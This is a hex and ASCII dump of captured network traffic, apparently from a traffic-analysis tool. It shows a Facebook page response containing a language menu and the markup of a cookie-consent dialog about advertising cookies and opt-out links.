72 2e 72 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 52 35 77 31 72 43 4a 22 2c 22 38 7a 62 45 5a 74
                                                                                                                Data Ascii: :{"m":["FbtLogging","IntlQtEventFalcoEvent"],"r":["BIylKC4"]},"be":1},"XUIDialogBody.react":{"r":["R5w1rCJ","8zbEZtu","OdpO3WF","kZUx5vm","JJDQYLd","ylLPkjA","YtU3C5u","8mzgYu5","IaR\/6uP","07JSiP0"],"be":1},"XUIDialogFooter.react":{"r":["R5w1rCJ","8zbEZt
                                                                                                                2022-10-13 11:08:18 UTC5726INData Raw: 41 4e 7a 77 5c 2f 22 2c 22 30 37 4a 53 69 50 30 22 2c 22 64 78 5c 2f 41 67 70 4f 22 2c 22 67 74 42 4b 72 41 62 22 2c 22 79 56 74 2b 54 79 69 22 2c 22 50 5c 2f 6d 72 35 56 45 22 2c 22 65 38 52 6b 4a 6f 79 22 2c 22 48 4c 57 74 71 66 72 22 5d 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 54 69 6d 65 53 6c 69 63 65 49 6d 70 6c 22 2c 22 53 65 72 76 65 72 4a 53 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 54 69 6d 65 53 6c 69 63 65 2c 53 65 72 76 65 72 4a 53 29 7b 76 61 72 20 73 3d 28 6e 65 77 20 53 65 72 76 65 72 4a 53 28 29 29 3b 73 2e 68 61 6e 64 6c 65 28 7b 22 64 65 66 69 6e 65 22 3a 5b 5b 22 4c 69 6e 6b 73 68 69 6d 48 61 6e 64 6c 65 72 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 73 75 70 70 6f 72 74 73 5f
                                                                                                                Data Ascii: ANzw\/","07JSiP0","dx\/AgpO","gtBKrAb","yVt+Tyi","P\/mr5VE","e8RkJoy","HLWtqfr"]);});</script><script>requireLazy(["TimeSliceImpl","ServerJS"],function(TimeSlice,ServerJS){var s=(new ServerJS());s.handle({"define":[["LinkshimHandlerConfig",[],{"supports_
                                                                                                                2022-10-13 11:08:18 UTC5728INData Raw: 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 31 5f 4f 4a 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 32 5f 77 67 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 33 5f 6e 76 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 34 5f 4c 4a 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 35 5f 6c 48 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 36 5f 4f 6f 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 37 5f 6a 4e 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 38 5f 6e 2b 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 39 5f 64 53 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31
                                                                                                                Data Ascii: __markup_3310c079_0_1_OJ","__markup_3310c079_0_2_wg","__markup_3310c079_0_3_nv","__markup_3310c079_0_4_LJ","__markup_3310c079_0_5_lH","__markup_3310c079_0_6_Oo","__markup_3310c079_0_7_jN","__markup_3310c079_0_8_n+","__markup_3310c079_0_9_dS","__markup_331
                                                                                                                2022-10-13 11:08:18 UTC5729INData Raw: 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 33 5f 6e 76 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 45 6e 67 6c 69 73 68 20 28 55 4b 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 65 6e 5f 55 53 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 74 72 75 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f
                                                                                                                Data Ascii: ected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_3_nv"},"label":"English (UK)","title":"","className":"headerItem"},{"class":"headerItem","value":"en_US","selected":true,"ctor":{"__m":"MenuSelectableItem"},"markup":{"_
                                                                                                                2022-10-13 11:08:18 UTC5731INData Raw: 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 6e 62 5f 4e 4f 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 62 5f 48 30 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 4e 6f 72 73 6b 20 28 62 6f 6b 6d 5c 75 30 30 65 35 6c 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76
                                                                                                                Data Ascii: "","className":"headerItem"},{"class":"headerItem","value":"nb_NO","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_b_H0"},"label":"Norsk (bokm\u00e5l)","title":"","className":"headerItem"},{"class":"headerItem","v
                                                                                                                2022-10-13 11:08:18 UTC5732INData Raw: 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 69 5f 39 4b 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 54 69 5c 75 31 65 62 66 6e 67 20 56 69 5c 75 31 65 63 37 74 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 74 72 5f 54 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6a 5f 42 4d 22 7d 2c 22 6c 61 62 65
                                                                                                                Data Ascii: "},"markup":{"__m":"__markup_3310c079_0_i_9K"},"label":"Ti\u1ebfng Vi\u1ec7t","title":"","className":"headerItem"},{"class":"headerItem","value":"tr_TR","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_j_BM"},"labe
                                                                                                                2022-10-13 11:08:18 UTC5734INData Raw: 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 70 5f 45 4d 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 39 33 39 5c 75 30 39 33 66 5c 75 30 39 32 38 5c 75 30 39 34 64 5c 75 30 39 32 36 5c 75 30 39 34 30 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 74 68 5f 54 48 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f
                                                                                                                Data Ascii: markup":{"__m":"__markup_3310c079_0_p_EM"},"label":"\u0939\u093f\u0928\u094d\u0926\u0940","title":"","className":"headerItem"},{"class":"headerItem","value":"th_TH","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_
                                                                                                                2022-10-13 11:08:18 UTC5735INData Raw: 55 49 4d 65 6e 75 54 68 65 6d 65 22 7d 7d 5d 2c 33 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 65 61 64 31 65 35 36 35 5f 30 5f 30 5f 36 47 22 2c 5b 22 44 69 61 6c 6f 67 58 22 2c 22 4c 61 79 65 72 46 61 64 65 4f 6e 48 69 64 65 22 2c 22 44 69 61 6c 6f 67 48 69 64 65 4f 6e 53 75 63 63 65 73 73 22 2c 22 4c 61 79 65 72 48 69 64 65 4f 6e 54 72 61 6e 73 69 74 69 6f 6e 22 2c 22 4c 61 79 65 72 52 65 6d 6f 76 65 4f 6e 48 69 64 65 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 6a 53 22 2c 22 48 54 4d 4c 22 5d 2c 5b 7b 22 77 69 64 74 68 22 3a 36 38 30 2c 22 61 75 74 6f 68 69 64 65 22 3a 6e 75 6c 6c 2c 22 74 69 74 6c 65 49 44 22 3a 6e 75 6c 6c 2c 22 72 65 64 69 72 65 63 74 55 52 49 22 3a 6e 75 6c 6c 2c 22 66 69 78 65 64 54 6f 70 50 6f 73 69 74 69 6f
                                                                                                                Data Ascii: UIMenuTheme"}}],3],["__inst_ead1e565_0_0_6G",["DialogX","LayerFadeOnHide","DialogHideOnSuccess","LayerHideOnTransition","LayerRemoveOnHide","__markup_9f5fac15_0_0_jS","HTML"],[{"width":680,"autohide":null,"titleID":null,"redirectURI":null,"fixedTopPositio
                                                                                                                2022-10-13 11:08:18 UTC5737INData Raw: 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20 73 70 5f 33 67 45 6e 47 54 78 62 37 7a 65 20 73 78 5f 32 63 65 35 35 63 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 36 61 20 75 69 50 6f 70 6f 76 65 72 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 37 5f 56 49 5c 22 3e 5c 75 30 30 33 43 61 20 72 6f 6c 65 3d 5c 22 62 75 74 74 6f 6e 5c 22 20 63 6c 61 73 73 3d 5c 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 35 70 69 20 5f 32 61 67 66 20 5f 34 6f 5f 34 20 5f 39 6f 2d 65 20 5f 70 20 5f 34 6a 79 33 20 5f 35 31 37 68 20 5f 35 31 73 79 5c 22 20 68 72 65 66 3d 5c 22 23 5c 22 20 73 74 79 6c 65 3d 5c 22 6d 61 78 2d 77 69 64 74 68 3a 32 30 30 70 78 3b 5c 22 20 61 72 69 61 2d 68 61 73 70 6f 70 75 70 3d 5c 22 74 72 75 65 5c 22 20
                                                                                                                Data Ascii: 3Ci class=\"img sp_3gEnGTxb7ze sx_2ce55c\">\u003C\/i>\u003Cdiv class=\"_6a uiPopover\" id=\"u_0_7_VI\">\u003Ca role=\"button\" class=\"_42ft _4jy0 _55pi _2agf _4o_4 _9o-e _p _4jy3 _517h _51sy\" href=\"#\" style=\"max-width:200px;\" aria-haspopup=\"true\"
                                                                                                                2022-10-13 11:08:18 UTC5738INData Raw: 35 66 61 35 0d 0a 5c 22 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 46 6f 72 20 61 64 76 65 72 74 69 73 69 6e 67 20 61 6e 64 20 6d 65 61 73 75 72 65 6d 65 6e 74 20 73 65 72 76 69 63 65 73 20 6f 66 66 20 6f 66 20 46 61 63 65 62 6f 6f 6b 20 50 72 6f 64 75 63 74 73 2c 20 61 6e 61 6c 79 74 69 63 73 2c 20 61 6e 64 20 74 6f 20 70 72 6f 76 69 64 65 20 63 65 72 74 61 69 6e 20 66 65 61 74 75 72 65 73 20 61 6e 64 20 69 6d 70 72 6f 76 65 20 6f 75 72 20 73 65 72 76 69 63 65 73 20 66 6f 72 20 79 6f 75 2c 20 77 65 20 75 73 65 20 74 6f 6f 6c 73 20 66 72 6f 6d 20 6f 74 68 65 72 20 63 6f 6d 70 61 6e 69 65 73 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 2e 20 54 68 65 73 65 20 63 6f 6d 70 61 6e 69 65 73 20 61 6c 73 6f 20 75 73
                                                                                                                Data Ascii: 5fa5\">\u003C\/div>\u003Cdiv>\u003Cdiv>For advertising and measurement services off of Facebook Products, analytics, and to provide certain features and improve our services for you, we use tools from other companies on Facebook. These companies also us
                                                                                                                2022-10-13 11:08:18 UTC5740INData Raw: 63 65 73 20 66 6f 72 20 79 6f 75 2e 20 54 68 65 73 65 20 63 6f 6d 70 61 6e 69 65 73 20 61 6c 73 6f 20 75 73 65 20 63 6f 6f 6b 69 65 73 2e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 70 3e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 39 5f 55 33 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 64 20 5f 39 6e 67 65 5c 22 20 74 69 74 6c 65 3d 5c 22 65 78 70 61 6e 64 61 62 6c 65 20 73 65 63 74 69 6f 6e 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 63 5c 22 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 66 5c 22 3e 5c 75 30 30 33 43 64 69
                                                                                                                Data Ascii: ces for you. These companies also use cookies.\u003C\/div>\u003C\/div>\u003Cp>\u003C\/p>\u003Cdiv class=\"_9vtg\" id=\"u_0_9_U3\">\u003Cbutton class=\"_9ngd _9nge\" title=\"expandable section\">\u003Cdiv class=\"_9ngc\">\u003Cspan class=\"_9ngf\">\u003Cdi
                                                                                                                2022-10-13 11:08:18 UTC5741INData Raw: 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 30 5c 22 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6b 5c 22 3e 4f 74 68 65 72 20 77 61 79 73 20 79 6f 75 20 63 61 6e 20 63 6f 6e 74 72 6f 6c 20 79 6f 75 72 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 61 5f 35 59 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 64 20 5f 39
                                                                                                                Data Ascii: >\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cp class=\"_9o-k\">Other ways you can control your information\u003C\/p>\u003C\/div>\u003Cdiv>\u003Cdiv class=\"_9vtg\" id=\"u_0_a_5Y\">\u003Cbutton class=\"_9ngd _9
                                                                                                                2022-10-13 11:08:18 UTC5743INData Raw: 20 59 6f 75 20 63 61 6e 20 63 6f 6e 74 72 6f 6c 20 74 68 69 73 20 69 6e 20 79 6f 75 72 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 73 65 74 74 69 6e 67 73 5c 2f 61 64 73 5c 2f 5c 22 3e 61 64 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 61 3e 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 73 69 2d 5c 22 3e 41 64 20 70 72 65 66 65 72 65 6e 63 65 73 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 59 6f 75 20 63 61 6e 20 75 73 65 20 79 6f 75 72 20 61 64 20 70 72 65 66 65 72 65 6e 63 65 73 20 74 6f 20 6c 65 61 72 6e 20 77 68 79 20 79 6f 75 26 23 30 33 39 3b 72 65 20 73 65 65
                                                                                                                Data Ascii: You can control this in your \u003Ca href=\"https:\/\/www.facebook.com\/settings\/ads\/\">ad settings\u003C\/a>.\u003C\/p>\u003Cp class=\"_9si-\">Ad preferences\u003C\/p>\u003Cp class=\"_9o-m\">You can use your ad preferences to learn why you&#039;re see
                                                                                                                2022-10-13 11:08:18 UTC5744INData Raw: 75 74 74 6f 6e 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 62 20 5f 39 6e 67 61 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 59 6f 75 20 63 61 6e 20 6f 70 74 20 6f 75 74 20 6f 66 20 73 65 65 69 6e 67 20 6f 6e 6c 69 6e 65 20 69 6e 74 65 72 65 73 74 2d 62 61 73 65 64 20 61 64 73 20 66 72 6f 6d 20 46 61 63 65 62 6f 6f 6b 20 61 6e 64 20 6f 74 68 65 72 20 70 61 72 74 69 63 69 70 61 74 69 6e 67 20 63 6f 6d 70 61 6e 69 65 73 20 74 68 72 6f 75 67 68 20 74 68 65 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c
                                                                                                                Data Ascii: utton>\u003Cdiv class=\"_9ngb _9nga\">\u003Cdiv>\u003Cp class=\"_9o-m\">You can opt out of seeing online interest-based ads from Facebook and other participating companies through the \u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\
                                                                                                                2022-10-13 11:08:18 UTC5745INData Raw: 73 65 20 6e 6f 74 65 20 74 68 61 74 20 61 64 20 62 6c 6f 63 6b 65 72 73 20 61 6e 64 20 74 6f 6f 6c 73 20 74 68 61 74 20 72 65 73 74 72 69 63 74 20 6f 75 72 20 63 6f 6f 6b 69 65 20 75 73 65 20 6d 61 79 20 69 6e 74 65 72 66 65 72 65 20 77 69 74 68 20 74 68 65 73 65 20 63 6f 6e 74 72 6f 6c 73 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 54 68 65 20 61 64 76 65 72 74 69 73 69 6e 67 20 63 6f 6d 70 61 6e 69 65 73 20 77 65 20 77 6f 72 6b 20 77 69 74 68 20 67 65 6e 65 72 61 6c 6c 79 20 75 73 65 20 63 6f 6f 6b 69 65 73 20 61 6e 64 20 73 69 6d 69 6c 61 72 20 74 65 63 68 6e 6f 6c 6f 67 69 65 73 20 61 73 20 70 61 72 74 20 6f 66 20 74 68 65 69 72 20 73 65 72 76 69 63 65 73 2e 20 54 6f 20 6c 65 61 72 6e 20 6d
                                                                                                                Data Ascii: se note that ad blockers and tools that restrict our cookie use may interfere with these controls.\u003C\/p>\u003Cp class=\"_9o-m\">The advertising companies we work with generally use cookies and similar technologies as part of their services. To learn m
                                                                                                                2022-10-13 11:08:18 UTC5747INData Raw: 5c 22 20 72 65 6c 3d 5c 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 45 75 72 6f 70 65 61 6e 20 49 6e 74 65 72 61 63 74 69 76 65 20 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 5c 2f 75 6c 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 63 5f 49 75 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 63 6c 61
                                                                                                                Data Ascii: \" rel=\"noopener nofollow\" data-lynx-mode=\"asynclazy\">European Interactive Digital Advertising Alliance\u003C\/a>\u003C\/li>\u003C\/ul>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cdiv class=\"_9vtg\" id=\"u_0_c_Iu\">\u003Cbutton cla
                                                                                                                2022-10-13 11:08:18 UTC5748INData Raw: 78 2d 74 44 5a 49 68 42 4f 41 48 56 4e 44 43 45 72 53 59 66 4a 70 6e 70 63 68 4c 49 42 4d 34 54 37 5a 5a 55 4e 4d 77 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63
                                                                                                                Data Ascii: x-tDZIhBOAHVNDCErSYfJpnpchLIBM4T7ZZUNMw\" target=\"_blank\" rel=\"noopener nofollow\" data-lynx-mode=\"asynclazy\">Google Chrome\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fsupport.microsoft.c
                                                                                                                2022-10-13 11:08:18 UTC5750INData Raw: 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 73 75 70 70 6f 72 74 2e 61 70 70 6c 65 2e 63 6f 6d 5c 75 30 30 32 35 32 46 65 6e 2d 75 73 5c 75 30 30 32 35 32 46 48 54 32 30 31 32 36 35 26 61 6d 70 3b 68 3d 41 54 33 70 6b 65 49 6c 52 64 45 67 54 67 33 2d 72 43 47 70 45 32 45 50 65 6a 57 56 57 59 30 6a 4f 72 4f 76 69 4f 66 63 4d 5f 5a 68 64 64 4e 64 58 71 56 78 68 71 70 69 4c 75 56 65 39 74 52 56 47 59 76 33 35 74 72 63 5f 67 59 68 59 32 49 37 53 74 53 4c 5f 31 4b 5a 65 32 51 63 45 53 31 69 66 63 4c 54 35 4b 63 57 75 49 49 69 71 57 7a 79 2d 57 59 68 74 48
                                                                                                                Data Ascii: 03Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fsupport.apple.com\u00252Fen-us\u00252FHT201265&amp;h=AT3pkeIlRdEgTg3-rCGpE2EPejWVWY0jOrOviOfcM_ZhddNdXqVxhqpiLuVe9tRVGYv35trc_gYhY2I7StSL_1KZe2QcES1ifcLT5KcWuIIiqWzy-WYhtH
                                                                                                                2022-10-13 11:08:18 UTC5751INData Raw: 64 3d 5c 22 75 5f 30 5f 65 5f 70 45 5c 22 3e 41 6c 6c 6f 77 20 65 73 73 65 6e 74 69 61 6c 20 61 6e 64 20 6f 70 74 69 6f 6e 61 6c 20 63 6f 6f 6b 69 65 73 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 22 7d 2c 39 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 30 5f 55 4e 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 42 61 68 61 73 61 20 49 6e 64 6f 6e 65 73 69 61 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 31 5f 4f 4a 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 44 61 6e 73 6b 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 32 5f 77 67 22 2c 7b 22 5f 5f 68 74 6d 6c
                                                                                                                Data Ascii: d=\"u_0_e_pE\">Allow essential and optional cookies\u003C\/button>\u003C\/div>\u003C\/div>\u003C\/div>"},9],["__markup_3310c079_0_0_UN",{"__html":"Bahasa Indonesia"},1],["__markup_3310c079_0_1_OJ",{"__html":"Dansk"},1],["__markup_3310c079_0_2_wg",{"__html
                                                                                                                2022-10-13 11:08:18 UTC5753INData Raw: 5c 75 30 34 33 61 5c 75 30 34 33 38 5c 75 30 34 33 39 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6e 5f 49 70 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 35 65 32 5c 75 30 35 64 31 5c 75 30 35 65 38 5c 75 30 35 64 39 5c 75 30 35 65 61 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6f 5f 61 39 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 33 39 5c 75 30 36 33 31 5c 75 30 36 32 38 5c 75 30 36 34 61 5c 75 30 36 32 39 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 70 5f 45 4d 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 39 33 39 5c 75 30 39 33 66 5c 75 30 39 32 38 5c 75 30 39 34 64 5c 75 30 39 32 36
